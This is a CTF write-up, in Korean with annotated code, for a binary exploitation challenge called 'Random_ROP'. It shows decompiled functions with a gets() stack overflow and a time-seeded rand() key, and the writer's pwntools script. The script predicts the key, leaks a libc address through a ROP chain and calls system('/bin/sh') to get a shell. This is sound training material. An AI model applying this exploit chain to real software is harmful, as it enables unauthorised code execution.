The_hacking_championship_junior Writeup

LeeDoHyun · May 13, 2020

dsec ctf 예선때 못풀었던 문제인데 다시 보니 쉬운문제였습니다.

// Decompiler output of the challenge binary's input handler.
// v1 is shown as a single char but sits at rbp-0x400, i.e. presumably the
// start of a 0x400-byte stack buffer.
__int64 vuln()
{
  char v1; // [rsp+0h] [rbp-400h]

  puts(&byte_400C18);
  gets(&v1);               // gets() has no length bound: input longer than the
                           // frame below rbp overwrites saved rbp / return address.
                           // Fix: fgets(buf, sizeof buf, stdin) or read() with an explicit size.
  write(1, "OK!\n", 4uLL);
  return 0LL;
}

#취약점 발생함수.

// Decompiler output of the challenge binary's key generator.
__int64 random_key()
{
  unsigned int v0; // eax

  v0 = time(0LL);          // seed is the current second, so the "random" key is
                           // reproducible by anyone running in the same second
  srand(v0);
  return rand();           // libc rand() is not a CSPRNG; an auth key should come
                           // from getrandom()/arc4random() or equivalent
}

#랜덤키 함수

그냥 python ctypes의 CDLL을 사용해서 libc를 연결시켜주고 동시에 시작하면 같은 값이 나옵니다. 나머지는 그냥 ROP 입니다.

ex.py

#!/usr/bin/env python2
#-*-coding:utf8-*-
# Writeup script for the Random_ROP challenge (Python 2 + pwntools; under
# Python 3 pwntools the str payloads/prompts below would need to be bytes).
#
# Two weaknesses of the target are exercised, both visible in the decompiled
# functions above:
#   1. random_key() seeds rand() with time(0), so the "random" key is
#      reproducible by any process started in the same second.
#      Mitigation: seed/generate from a CSPRNG (getrandom, arc4random).
#   2. vuln() reads input with gets(), which has no length bound, so the
#      stack buffer at rbp-0x400 can be overrun.  Mitigation: fgets()/read()
#      with an explicit size; stack canaries and PIE would additionally
#      break the fixed addresses this script relies on.

from pwn import *
from ctypes import CDLL

context.log_level = 'debug'
r = process('./Random_ROP')        # local instance of the target
c = CDLL('libc.so.6')              # same libc as the target, used to replay time/srand/rand
libc = ELF('libc.so.6')
e = ELF('./Random_ROP')

pop_rdi = 0x0000000000400b43       # presumably a `pop rdi; ret` gadget; fixed address, binary is not PIE
puts_plt = e.plt['puts']
puts_got = e.got['puts']
vuln = e.symbols['vuln']
ret = 0x00000000004006e9           # presumably a lone `ret`, used before system() below (likely stack alignment)

r.recvuntil('INPUT ID :')
r.sendline('a')
r.recvuntil('INPUT PW :')
r.sendline('a')

# Replay random_key(): same libc, same second -> same rand() output.
data = c.time(0)
c.srand(data)
random_key = c.rand()
r.recvuntil('인증키를 입력해 주세요')
r.sendline(str(random_key))

log.success('random key = {}'.format(str(random_key)))

r.recvuntil('원하시는 도움을 입력해주세요!')
# Stage 1: fill the 0x400-byte buffer plus (presumably) saved rbp, then
# return into puts(puts@got) to print the resolved libc address of puts,
# and back into vuln() so a second input is read.
payload = 'a'*(0x400 + 0x8)
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(vuln)
r.sendline(payload)

r.recvuntil('OK!\n')

# The printed pointer is 6 significant bytes (ending in 0x7f); pad to 8 for u64.
puts_leak = u64(r.recvuntil('\x7f')[-6:] + '\x00\x00')
libc_base = puts_leak - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh').next()

log.success('puts leak : {}'.format(hex(puts_leak)))
log.success('libc base : {}'.format(hex(libc_base)))
log.success('system addr : {}'.format(hex(system)))
log.success('binsh addr : {}'.format(hex(binsh)))

# Stage 2: same overflow, now with the libc addresses computed from the leak.
payload = 'a'*(0x400 + 0x8)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)
r.sendline(payload)
r.interactive()
